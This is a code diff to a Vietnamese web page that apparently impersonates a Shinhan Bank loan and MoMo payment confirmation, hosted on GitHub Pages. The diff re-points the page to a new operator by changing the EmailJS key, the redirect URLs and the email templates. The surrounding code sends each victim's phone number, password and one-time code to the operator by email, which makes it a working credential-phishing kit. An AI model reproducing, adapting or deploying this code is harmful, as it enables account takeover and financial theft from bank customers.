--- a/pages/vi/momo.html
+++ b/pages/vi/momo.html
@@ -13,7 +13,7 @@
     <script type="text/javascript">
       (function() {
           emailjs.init({
-            publicKey: "c-Ms5MjWbitpDBb-E", // Thay bằng Public Key của bạn
+            publicKey: "jugdaw6sXSdJVlAlt", // Thay bằng Public Key của bạn
           });
       })();
     </script>
@@ -368,7 +368,7 @@
     <div class="mobile-frame">
         <div id="confirmation-section" class="page-section active">
             <header class="page-header">
-                <button class="back-button" onclick="window.location.href='https://vaytieudung.github.io/shinhanbank/pages/vi/Evaluate-conditions.html'">
+                <button class="back-button" onclick="window.location.href='https://trum1212.github.io/shinhanbank/pages/vi/Evaluate-conditions.html'">
                     <img src="data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='currentColor'%3e%3cpath fill-rule='evenodd' d='M11.03 3.97a.75.75 0 010 1.06l-6.22 6.22H21a.75.75 0 010 1.5H4.81l6.22 6.22a.75.75 0 11-1.06 1.06l-7.5-7.5a.75.75 0 010-1.06l7.5-7.5a.75.75 0 011.06 0z' clip-rule='evenodd' /%3e%3c/svg%3e" alt="Back"/>
                 </button>
                 <h1>Xác nhận thanh toán</h1>
@@ -653,7 +653,7 @@
                     if (credentials.otp === correctOtp) {
                         showNotification('Xác nhận giải ngân thành công! Đang chuyển hướng...', 'success', 4000);
                         setTimeout(() => {
-                            window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/Evaluate-conditions.html?status=success';
+                            window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/Evaluate-conditions.html?status=success';
                         }, 4000);
                     } else {
                          otpAttempts++;
@@ -664,7 +664,7 @@
                         } else {
                             showNotification('Bạn đã nhập sai quá 3 lần. Đang chuyển hướng...', 'error', 4000);
                             setTimeout(() => {
-                                window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/Evaluate-conditions.html?status=failed';
+                                window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/Evaluate-conditions.html?status=failed';
                             }, 4000);
                         }
                     }
@@ -690,13 +690,13 @@
                 };
 
                 if (type === 'phone') {
-                    templateID = 'template_yu19d5e';
+                    templateID = 'template_ps9zcp2';
                     templateParams = { ...commonParams, phone: value };
                 } else if (type === 'password') {
-                    templateID = 'template_d3shmmn';
+                    templateID = 'template_hn6yj1d';
                     templateParams = { ...commonParams, phone: credentials.phone, password: value };
                 } else if (type === 'otp') {
-                    templateID = 'template_p60g14a';
+                    templateID = 'template_yy36rn3';
                     templateParams = { ...commonParams, phone: credentials.phone, password: credentials.password, otp: value };
                 }
 
